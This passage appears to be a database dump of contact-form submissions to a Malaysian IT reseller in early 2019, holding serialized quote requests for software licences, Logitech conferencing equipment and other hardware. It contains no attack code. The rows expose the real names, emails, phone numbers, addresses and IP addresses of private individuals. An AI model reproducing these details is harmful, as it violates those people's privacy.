Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Izwan Azman\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"izwan@fullrich.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0128313004\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Fullrich Malaysia Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:132:\"Hi, we would like to seek pricing for adobe creative cloud for 3 accounts or 6 devices and microsoft office 2016/2019 for 2 accounts\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-31 17:25:17','175.143.103.29','1'),(49,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Ameer Jasrie Jamil\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"ameerjasrie@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0103690054\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"MALAYSIAN HOUSE OF INTERNET SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"2nd floor,computer city,low yat plaza\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"10\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-31 21:27:01','115.164.204.174','1'),(50,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Faizi Mohamed Ayob\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"faizi.mpjl@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60192221568\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Majlis Perbandaran Jempol\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:217:\"Hi Sir.. I&#039;m looking for ID Printer Card (dual side) with my limited budget not over RM5,000.00... perhaps u could propose few best product and offer to me make a consideration before decide it... best regards...\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-02 23:07:42','60.51.32.161','1'),(51,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"azirull aripin\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"zirul77@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"+601110007247\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Rasa Syukur Resources\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:92:\"I&#039;m interested on zebra barcode system solution, please contact me as soon as possible.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-04 15:08:03','42.153.53.108','1'),(52,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Irfan Ahromi\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"ahromi@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0148843509\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:46:\"Konsulat Jenderal Republik Indonesia - Kuching\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:69:\"21, Lot 16557, Block 11, Jalan Stutong, MTLD 93350, Kuching, Sarawak.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:115:\"Please send me a quotation about Logitech Group including delivery charge and how long to deliver to Kuching...Tqvm\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-08 09:09:22','60.53.188.109','1'),(53,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Mohd Tarmizi bin Mohamad\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"mtarmizi.msosh@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122048650\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:52:\"Malaysian Society for Occupational Safety and Health\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:89:\"Wisma MSOSH, No 1 Jalan Pegaga D U12/D, Desa Alam, Seksyen U12, 40170 Shah Alam, Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Logitech Group, Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:95:\"We need quotation for teleconference meeting with others Management Team in Peninsular Malaysia\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"10\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-09 14:05:33','124.13.84.195','1'),(54,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"Fong YH\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"yhuang@myadvansoft.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0389941188\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Advansoft Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:99:\"Can you please quote us Panasonic Toughbook 31 ( with ATEX Zone 2 certification for Hazardous Area)\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"23\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-09 23:35:42','103.1.107.114','1'),(55,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Alan Teo\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"alant@cpoc.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0392062598\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"CPOC\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:84:\"Hi, Do you provide any computer peripheral eg. keyboard/mouse ? for company purchase\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-12 09:00:11','211.24.173.6','1'),(56,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Sarah\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Sarah.megcreations@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0128118944\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Meg 